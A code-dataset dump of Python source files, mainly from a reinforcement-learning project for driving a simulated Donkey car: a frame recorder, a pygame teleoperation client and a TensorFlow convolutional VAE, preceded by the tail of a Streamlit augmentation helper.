st.sidebar.subheader('params for {0}\n{1}'.format(
current_choice,
desc,
))
for params in augmentations[current_choice]:
if isinstance(params['param_name'], list):
res = elements_type[params['type']](
current_choice,
session_state,
**params,
)
for i, subparams in enumerate(params['param_name']):
current_params.update({subparams: res[i]})
else:
res = elements_type[params['type']](
current_choice,
session_state,
**params,
)
current_params.update({params['param_name']: res})
return current_params
def dict_update(
aug,
current_choice,
augmentations,
session_state,
):
"""
Returns settings for current transformation.
Parameters:
aug: settings for current_choice
current_choice: selected currnet transformation as a string
augmentations: dict with all available transformation from json file
session_state: current session information
Returns:
settings for current transfornation
"""
if aug:
return setup_current_choice(
current_choice,
augmentations,
session_state,
)
``` |
{
"source": "7-B/learning-to-drive-in-5-minutes",
"score": 3
} |
#### File: learning-to-drive-in-5-minutes/teleop/recorder.py
```python
import os
import cv2
class Recorder(object):
"""
Class to record images for offline VAE training
:param env: (Gym env)
:param folder: (str)
:param start_recording: (bool)
:param verbose: (int)
"""
def __init__(self, env, folder='logs/recorded_data/', start_recording=False, verbose=0):
super(Recorder, self).__init__()
self.env = env
self.is_recording = start_recording
self.folder = folder
self.current_idx = 0
self.verbose = verbose
self.observation_space = env.observation_space
self.action_space = env.action_space
# Create folder if needed
os.makedirs(folder, exist_ok=True)
images_idx = [int(im.split('.jpg')[0]) for im in os.listdir(folder) if im.endswith('.jpg')]
if len(images_idx) > 0:
self.current_idx = max(images_idx)
if verbose >= 1:
print("Recorder current idx: {}".format(self.current_idx))
def reset(self):
obs = self.env.reset()
if self.is_recording:
self.save_image()
return obs
def render(self, mode='rgb_array'):
return self.env.render(mode=mode)
def seed(self, seed=None):
return self.env.seed(seed)
def step(self, action):
obs, reward, done, info = self.env.step(action)
if self.is_recording:
self.save_image()
return obs, reward, done, info
def save_image(self):
image = self.env.render(mode='rgb_array')
# Convert RGB to BGR
# image = image[:, :, ::-1]
cv2.imwrite("{}/{}.jpg".format(self.folder, self.current_idx), image)
if self.verbose >= 2:
print("Saving", "{}/{}.jpg".format(self.folder, self.current_idx))
self.current_idx += 1
def set_recording_status(self, is_recording):
self.is_recording = is_recording
if self.verbose >= 1:
print("Setting recording to {}".format(is_recording))
def toggle_recording(self):
self.set_recording_status(not self.is_recording)
def exit_scene(self):
self.env.exit_scene()
```
#### File: learning-to-drive-in-5-minutes/teleop/teleop_client.py
```python
import argparse
import os
import time
import cv2
from threading import Event, Thread
import numpy as np
import pygame
from pygame.locals import *
from stable_baselines.bench import Monitor
from stable_baselines.common.vec_env import VecFrameStack, VecNormalize, DummyVecEnv
from config import MIN_STEERING, MAX_STEERING, MIN_THROTTLE, MAX_THROTTLE, \
LEVEL, N_COMMAND_HISTORY, TEST_FRAME_SKIP, ENV_ID, FRAME_SKIP, \
SHOW_IMAGES_TELEOP, REWARD_CRASH, CRASH_SPEED_WEIGHT
from donkey_gym.envs.vae_env import DonkeyVAEEnv
from utils.utils import ALGOS, get_latest_run_id, load_vae
from .recorder import Recorder
UP = (MAX_THROTTLE, 0)
LEFT = (0, 1)
RIGHT = (0, -1)
DOWN = (-MAX_THROTTLE * 1.0, 0)
STOP = (0, 0)
KEY_CODE_SPACE = 32
MAX_TURN = 1
# Smoothing constants
STEP_THROTTLE = 0.3
STEP_TURN = 0.4
TELEOP_RATE = 1 / 60 # 60 fps
GREEN = (72, 205, 40)
RED = (205, 39, 46)
GREY = (187, 179, 179)
BLACK = (36, 36, 36)
WHITE = (230, 230, 230)
ORANGE = (200, 110, 0)
moveBindingsGame = {
K_UP: UP,
K_LEFT: LEFT,
K_RIGHT: RIGHT,
K_DOWN: DOWN
}
pygame.font.init()
FONT = pygame.font.SysFont('Open Sans', 25)
SMALL_FONT = pygame.font.SysFont('Open Sans', 20)
KEY_MIN_DELAY = 0.4
MAX_N_OUT_OF_BOUND = FRAME_SKIP
def control(x, theta, control_throttle, control_steering):
"""
Smooth control.
:param x: (float)
:param theta: (float)
:param control_throttle: (float)
:param control_steering: (float)
:return: (float, float)
"""
target_throttle = x
target_steering = MAX_TURN * theta
if target_throttle > control_throttle:
control_throttle = min(target_throttle, control_throttle + STEP_THROTTLE)
elif target_throttle < control_throttle:
control_throttle = max(target_throttle, control_throttle - STEP_THROTTLE)
else:
control_throttle = target_throttle
if target_steering > control_steering:
control_steering = min(target_steering, control_steering + STEP_TURN)
elif target_steering < control_steering:
control_steering = max(target_steering, control_steering - STEP_TURN)
else:
control_steering = target_steering
return control_throttle, control_steering
class TeleopEnv(object):
def __init__(self, env, model=None, is_recording=False,
is_training=False, deterministic=True):
super(TeleopEnv, self).__init__()
self.env = env
self.model = model
self.need_reset = False
self.is_manual = True
self.is_recording = is_recording
self.is_training = is_training
# For keyboard trigger
self.fill_buffer = False
# For display
self.is_filling = False
self.current_obs = None
self.exit_event = Event()
self.done_event = Event()
self.ready_event = Event()
# For testing
self.deterministic = deterministic
self.window = None
self.process = None
self.action = None
self.observation_space = env.observation_space
self.action_space = env.action_space
self.donkey_env = None
self.n_out_of_bound = 0
self.current_image = None
self.image_surface = None
self.decoded_surface = None
self.start_process()
def start_process(self):
"""Start preprocessing process"""
self.process = Thread(target=self.main_loop)
# Make it a deamon, so it will be deleted at the same time
# of the main process
self.process.daemon = True
self.process.start()
def step(self, action):
self.action = action
self.current_obs, reward, done, info = self.env.step(action)
# Overwrite done
if self.done_event.is_set():
done = False
# Negative reward for several steps
if self.n_out_of_bound < MAX_N_OUT_OF_BOUND:
self.n_out_of_bound += 1
else:
done = True
# penalize the agent for getting off the road fast
norm_throttle = (action[1] - MIN_THROTTLE) / (MAX_THROTTLE - MIN_THROTTLE)
reward = REWARD_CRASH - CRASH_SPEED_WEIGHT * norm_throttle
else:
done = False
return self.current_obs, reward, done, info
def render(self, mode='human'):
return self.env.render(mode)
def reset(self):
self.n_out_of_bound = 0
# Disable reset after init
if self.need_reset:
self.need_reset = False
return self.env.reset()
else:
# Zero speed, neutral angle
self.donkey_env.controller.take_action([0, 0])
return self.current_obs
def wait_for_teleop_reset(self):
self.ready_event.wait()
return self.reset()
def exit(self):
self.env.reset()
self.donkey_env.exit_scene()
def wait(self):
self.process.join()
def main_loop(self):
# Pygame require a window
pygame.init()
self.window = pygame.display.set_mode((800, 500), RESIZABLE)
end = False
control_throttle, control_steering = 0, 0
action = [control_steering, control_throttle]
self.update_screen(action)
donkey_env = self.env
# Unwrap env
if isinstance(donkey_env, Recorder):
donkey_env = donkey_env.env
while isinstance(donkey_env, VecNormalize) or isinstance(donkey_env, VecFrameStack):
donkey_env = donkey_env.venv
if isinstance(donkey_env, DummyVecEnv):
donkey_env = donkey_env.envs[0]
if isinstance(donkey_env, Monitor):
donkey_env = donkey_env.env
assert isinstance(donkey_env, DonkeyVAEEnv), print(donkey_env)
self.donkey_env = donkey_env
last_time_pressed = {'space': 0, 'm': 0, 't': 0, 'b': 0, 'o': 0}
self.current_obs = self.reset()
if self.model is not None:
# Prevent error (uninitialized value)
self.model.n_updates = 0
while not end:
x, theta = 0, 0
keys = pygame.key.get_pressed()
for keycode in moveBindingsGame.keys():
if keys[keycode]:
x_tmp, th_tmp = moveBindingsGame[keycode]
x += x_tmp
theta += th_tmp
if keys[K_SPACE] and (time.time() - last_time_pressed['space']) > KEY_MIN_DELAY:
self.is_recording = not self.is_recording
if isinstance(self.env, Recorder):
self.env.toggle_recording()
# avoid multiple key press
last_time_pressed['space'] = time.time()
if keys[K_m] and (time.time() - last_time_pressed['m']) > KEY_MIN_DELAY:
self.is_manual = not self.is_manual
# avoid multiple key press
last_time_pressed['m'] = time.time()
if self.is_training:
if self.is_manual:
# Stop training
self.ready_event.clear()
self.done_event.set()
else:
# Start training
self.done_event.clear()
self.ready_event.set()
if keys[K_t] and (time.time() - last_time_pressed['t']) > KEY_MIN_DELAY:
self.is_training = not self.is_training
# avoid multiple key press
last_time_pressed['t'] = time.time()
if keys[K_b] and (time.time() - last_time_pressed['b']) > KEY_MIN_DELAY:
self.fill_buffer = not self.fill_buffer
# avoid multiple key press
last_time_pressed['b'] = time.time()
if keys[K_r]:
self.current_obs = self.env.reset()
if keys[K_o]:
if (self.is_manual
and self.model is not None
and hasattr(self.model, 'optimize')
and (time.time() - last_time_pressed['o']) > KEY_MIN_DELAY):
print("Optimizing")
self.model.optimize(len(self.model.replay_buffer), None, self.model.learning_rate(1))
last_time_pressed['o'] = time.time()
if keys[K_l]:
self.env.reset()
self.donkey_env.exit_scene()
self.need_reset = True
# Smooth control for teleoperation
control_throttle, control_steering = control(x, theta, control_throttle, control_steering)
# Send Orders
if self.model is None or self.is_manual:
t = (control_steering + MAX_TURN) / (2 * MAX_TURN)
steering_order = MIN_STEERING * t + MAX_STEERING * (1 - t)
self.action = [steering_order, control_throttle]
elif self.model is not None and not self.is_training:
self.action, _ = self.model.predict(self.current_obs, deterministic=self.deterministic)
self.is_filling = False
if not (self.is_training and not self.is_manual):
if self.is_manual and not self.fill_buffer:
donkey_env.controller.take_action(self.action)
self.current_obs, reward, done, info = donkey_env.observe()
self.current_obs, _, _, _ = donkey_env.postprocessing_step(self.action, self.current_obs,
reward, done, info)
else:
if self.fill_buffer:
old_obs = self.current_obs
self.current_obs, reward, done, _ = self.env.step(self.action)
# Store the transition in the replay buffer
if self.fill_buffer and hasattr(self.model, 'replay_buffer'):
assert old_obs is not None
if old_obs.shape[1] == self.current_obs.shape[1]:
self.is_filling = True
self.model.replay_buffer.add(old_obs, self.action, reward, self.current_obs, float(done))
if isinstance(self.env, Recorder):
self.env.save_image()
self.current_image = self.env.render(mode='rgb_array')
self.update_screen(self.action)
for event in pygame.event.get():
if event.type == QUIT or event.type == KEYDOWN and event.key in [K_ESCAPE, K_q]:
end = True
pygame.display.flip()
# Limit FPS
pygame.time.Clock().tick(1 / TELEOP_RATE)
self.ready_event.set()
self.exit_event.set()
def write_text(self, text, x, y, font, color=GREY):
text = str(text)
text = font.render(text, True, color)
self.window.blit(text, (x, y))
def clear(self):
self.window.fill((0, 0, 0))
def update_screen(self, action):
self.clear()
steering, throttle = action
self.write_text('Throttle: {:.2f}, Steering: {:.2f}'.format(throttle, steering), 20, 0, FONT, WHITE)
help_str = 'Use arrow keys to move, q or ESCAPE to exit.'
self.write_text(help_str, 20, 50, SMALL_FONT)
help_2 = 'space key: toggle recording -- m: change mode -- r: reset -- l: reset track'
self.write_text(help_2, 20, 100, SMALL_FONT)
if isinstance(self.env, Recorder):
self.write_text('Recording Status:', 20, 150, SMALL_FONT, WHITE)
if self.is_recording:
text, text_color = 'RECORDING', RED
else:
text, text_color = 'NOT RECORDING', GREEN
self.write_text(text, 200, 150, SMALL_FONT, text_color)
self.write_text('Mode:', 20, 200, SMALL_FONT, WHITE)
if self.is_manual:
text, text_color = 'MANUAL', GREEN
else:
text, text_color = 'AUTONOMOUS', ORANGE
self.write_text(text, 200, 200, SMALL_FONT, text_color)
self.write_text('Training Status:', 20, 250, SMALL_FONT, WHITE)
if self.is_training:
text, text_color = 'TRAINING', RED
else:
text, text_color = 'TESTING', GREEN
self.write_text(text, 200, 250, SMALL_FONT, text_color)
if self.is_filling:
text, text_color = 'FILLING THE BUFFER', RED
else:
text, text_color = '', GREEN
self.write_text(text, 200, 300, SMALL_FONT, text_color)
if self.current_image is not None and SHOW_IMAGES_TELEOP:
current_image = np.swapaxes(self.current_image, 0, 1)
if self.image_surface is None:
self.image_surface = pygame.pixelcopy.make_surface(current_image)
pygame.pixelcopy.array_to_surface(self.image_surface, current_image)
self.window.blit(self.image_surface, (20, 350))
if (self.donkey_env is not None
and self.donkey_env.vae is not None
and self.current_obs is not None
and SHOW_IMAGES_TELEOP):
vae_dim = self.donkey_env.vae.z_size
encoded = self.current_obs[:, :vae_dim]
reconstructed_image = self.donkey_env.vae.decode(encoded)[0]
# Convert BGR to RGB
# reconstructed_image = reconstructed_image[:, :, ::-1]
reconstructed_image = np.swapaxes(reconstructed_image, 0, 1)
if self.decoded_surface is None:
self.decoded_surface = pygame.pixelcopy.make_surface(reconstructed_image)
pygame.pixelcopy.array_to_surface(self.decoded_surface, reconstructed_image)
self.window.blit(self.decoded_surface, (220, 350))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', help='Log folder', type=str, default='logs')
parser.add_argument('--record-folder', help='Record folder, where images are saved', type=str,
default='logs/recorded_data/')
parser.add_argument('--algo', help='RL Algorithm', default='',
type=str, required=False, choices=list(ALGOS.keys()))
parser.add_argument('-n', '--n-timesteps', help='number of timesteps', default=1000,
type=int)
parser.add_argument('--exp-id', help='Experiment ID (-1: no exp folder, 0: latest)', default=0,
type=int)
parser.add_argument('-vae', '--vae-path', help='Path to saved VAE', type=str, default='')
args = parser.parse_args()
algo = args.algo
folder = args.folder
model = None
vae = None
os.environ['DONKEY_NAME'] = "my_robot1234"
os.environ['DONKEY_MQTT_BROKER'] = "192.168.0.24"
if algo != '':
if args.exp_id == 0:
args.exp_id = get_latest_run_id(os.path.join(folder, algo), ENV_ID)
print('Loading latest experiment, id={}'.format(args.exp_id))
# Sanity checks
if args.exp_id > 0:
log_path = os.path.join(folder, algo, '{}_{}'.format(ENV_ID, args.exp_id))
else:
log_path = os.path.join(folder, algo)
model_path = "{}/{}.pkl".format(log_path, ENV_ID)
assert os.path.isdir(log_path), "The {} folder was not found".format(log_path)
assert os.path.isfile(model_path), "No model found for {} on {}, path: {}".format(algo, ENV_ID, model_path)
model = ALGOS[algo].load(model_path)
if args.vae_path != '':
print("Loading VAE ...")
vae = load_vae(args.vae_path)
if vae is None:
N_COMMAND_HISTORY = 0
env = DonkeyVAEEnv(level=LEVEL, frame_skip=TEST_FRAME_SKIP, vae=vae, const_throttle=None, min_throttle=MIN_THROTTLE,
max_throttle=MAX_THROTTLE, max_cte_error=10, n_command_history=N_COMMAND_HISTORY)
env = Recorder(env, folder=args.record_folder, verbose=1)
try:
env = TeleopEnv(env, model=model)
env.wait()
except KeyboardInterrupt as e:
pass
finally:
env.exit()
time.sleep(0.5)
```
#### File: learning-to-drive-in-5-minutes/vae/model.py
```python
import os
import json
import cloudpickle
import numpy as np
import tensorflow as tf
def conv_to_fc(input_tensor):
"""
Reshapes a Tensor from a convolutional network to a Tensor for a fully connected network
:param input_tensor: (TensorFlow Tensor) The convolutional input tensor
:return: (TensorFlow Tensor) The fully connected output tensor
"""
n_hidden = np.prod([v.value for v in input_tensor.get_shape()[1:]])
input_tensor = tf.reshape(input_tensor, [-1, n_hidden])
return input_tensor
class ConvVAE(object):
"""
:param z_size: (int)
:param batch_size: (int)
:param learning_rate: (float)
:param kl_tolerance: (float)
:param is_training: (bool)
:param beta: (float) weight for KL loss
:param reuse: (bool)
"""
def __init__(self, z_size=512, batch_size=100, learning_rate=0.0001,
kl_tolerance=0.5, is_training=True, beta=1.0, reuse=False):
self.z_size = z_size
self.batch_size = batch_size
self.learning_rate = learning_rate
self.is_training = is_training
self.kl_tolerance = kl_tolerance
self.beta = beta
self.reuse = reuse
self.graph = None
self.input_tensor = None
self.output_tensor = None
with tf.variable_scope('conv_vae', reuse=self.reuse):
self._build_graph()
with self.graph.as_default():
self.params = tf.trainable_variables()
self._init_session()
def _build_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
self.input_tensor = tf.placeholder(tf.float32, shape=[None, 80, 160, 3])
# Encoder
h = tf.layers.conv2d(self.input_tensor, 32, 4, strides=2, activation=tf.nn.relu, name="enc_conv1")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv2")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv3")
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv4")
# h = tf.reshape(h, [-1, 3 * 8 * 256])
h = conv_to_fc(h)
# VAE
self.mu = tf.layers.dense(h, self.z_size, name="enc_fc_mu")
self.logvar = tf.layers.dense(h, self.z_size, name="enc_fc_log_var")
self.sigma = tf.exp(self.logvar / 2.0)
self.epsilon = tf.random_normal([self.batch_size, self.z_size])
# self.epsilon = tf.random_normal([None, self.z_size])
# self.z = self.mu + self.sigma * self.epsilon
if self.is_training:
self.z = self.mu + self.sigma * self.epsilon
else:
self.z = self.mu
# Decoder
h = tf.layers.dense(self.z, 3 * 8 * 64, name="dec_fc")
h = tf.reshape(h, [-1, 3, 8, 64])
h = tf.layers.conv2d_transpose(h, 64, 4, strides=2, activation=tf.nn.relu, name="dec_deconv1")
h = tf.layers.conv2d_transpose(h, 64, 4, strides=2, activation=tf.nn.relu, name="dec_deconv2")
h = tf.layers.conv2d_transpose(h, 32, 5, strides=2, activation=tf.nn.relu, name="dec_deconv3")
self.output_tensor = tf.layers.conv2d_transpose(h, 3, 4, strides=2, activation=tf.nn.sigmoid,
name="dec_deconv4")
# train ops
if self.is_training:
self.global_step = tf.Variable(0, name='global_step', trainable=False)
# reconstruction loss
self.r_loss = tf.reduce_sum(
tf.square(self.input_tensor - self.output_tensor),
reduction_indices=[1, 2, 3]
)
self.r_loss = tf.reduce_mean(self.r_loss)
# augmented kl loss per dim
self.kl_loss = - 0.5 * tf.reduce_sum(
(1 + self.logvar - tf.square(self.mu) - tf.exp(self.logvar)),
reduction_indices=1
)
if self.kl_tolerance > 0:
self.kl_loss = tf.maximum(self.kl_loss, self.kl_tolerance * self.z_size)
self.kl_loss = tf.reduce_mean(self.kl_loss)
self.loss = self.r_loss + self.beta * self.kl_loss
# training
self.lr = tf.Variable(self.learning_rate, trainable=False)
self.optimizer = tf.train.AdamOptimizer(self.lr)
grads = self.optimizer.compute_gradients(self.loss) # can potentially clip gradients here.
self.train_op = self.optimizer.apply_gradients(
grads, global_step=self.global_step, name='train_step')
# initialize vars
self.init = tf.global_variables_initializer()
def _init_session(self):
"""Launch tensorflow session and initialize variables"""
self.sess = tf.Session(graph=self.graph)
self.sess.run(self.init)
def close_sess(self):
""" Close tensorflow session """
self.sess.close()
def encode(self, input_tensor):
return self.sess.run(self.z, feed_dict={self.input_tensor: input_tensor})
def decode(self, z):
return self.sess.run(self.output_tensor, feed_dict={self.z: z})
def get_model_params(self):
# get trainable params.
model_names = []
model_params = []
model_shapes = []
with self.graph.as_default():
t_vars = tf.trainable_variables()
for var in t_vars:
param_name = var.name
p = self.sess.run(var)
model_names.append(param_name)
params = np.round(p * 10000).astype(np.int).tolist()
model_params.append(params)
model_shapes.append(p.shape)
return model_params, model_shapes, model_names
def set_params(self, params):
assign_ops = []
for param, loaded_p in zip(self.params, params):
assign_ops.append(param.assign(loaded_p))
self.sess.run(assign_ops)
def get_params(self):
return self.sess.run(self.params)
def set_model_params(self, params):
with self.graph.as_default():
t_vars = tf.trainable_variables()
idx = 0
for var in t_vars:
pshape = self.sess.run(var).shape
p = np.array(params[idx])
assert pshape == p.shape, "inconsistent shape"
assign_op = var.assign(p.astype(np.float) / 10000.)
self.sess.run(assign_op)
idx += 1
def load_json(self, jsonfile='vae.json'):
with open(jsonfile, 'r') as f:
params = json.load(f)
self.set_model_params(params)
def save_json(self, jsonfile='vae.json'):
model_params, model_shapes, model_names = self.get_model_params()
qparams = []
for p in model_params:
qparams.append(p)
with open(jsonfile, 'wt') as outfile:
json.dump(qparams, outfile, sort_keys=True, indent=0, separators=(',', ': '))
def save_model(self, model_save_path):
sess = self.sess
with self.graph.as_default():
saver = tf.train.Saver(tf.global_variables())
checkpoint_path = os.path.join(model_save_path, 'vae')
tf.logging.info('saving model %s.', checkpoint_path)
saver.save(sess, checkpoint_path, 0) # just keep one
def load_checkpoint(self, checkpoint_path):
sess = self.sess
with self.graph.as_default():
saver = tf.train.Saver(tf.global_variables())
ckpt = tf.train.get_checkpoint_state(checkpoint_path)
print('loading model', ckpt.model_checkpoint_path)
tf.logging.info('Loading model %s.', ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
@staticmethod
def _save_to_file(save_path, data=None, params=None):
if isinstance(save_path, str):
_, ext = os.path.splitext(save_path)
if ext == "":
save_path += ".pkl"
with open(save_path, "wb") as file_:
cloudpickle.dump((data, params), file_)
else:
# Here save_path is a file-like object, not a path
cloudpickle.dump((data, params), save_path)
def save(self, save_path):
data = {
"z_size": self.z_size,
"batch_size": self.batch_size,
"learning_rate": self.learning_rate,
"is_training": self.is_training,
"kl_tolerance": self.kl_tolerance
}
params = self.sess.run(self.params)
self._save_to_file(save_path, data=data, params=params)
@staticmethod
def _load_from_file(load_path):
if isinstance(load_path, str):
if not os.path.exists(load_path):
if os.path.exists(load_path + ".pkl"):
load_path += ".pkl"
else:
raise ValueError("Error: the file {} could not be found".format(load_path))
with open(load_path, "rb") as file:
data, params = cloudpickle.load(file)
else:
# Here load_path is a file-like object, not a path
data, params = cloudpickle.load(load_path)
return data, params
@classmethod
def load(cls, load_path, **kwargs):
data, params = cls._load_from_file(load_path)
model = cls(data['z_size'], data['batch_size'],
data['learning_rate'], data['kl_tolerance'],
data['is_training'])
model.__dict__.update(data)
model.__dict__.update(kwargs)
restores = []
for param, loaded_p in zip(model.params, params):
restores.append(param.assign(loaded_p))
model.sess.run(restores)
return model
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.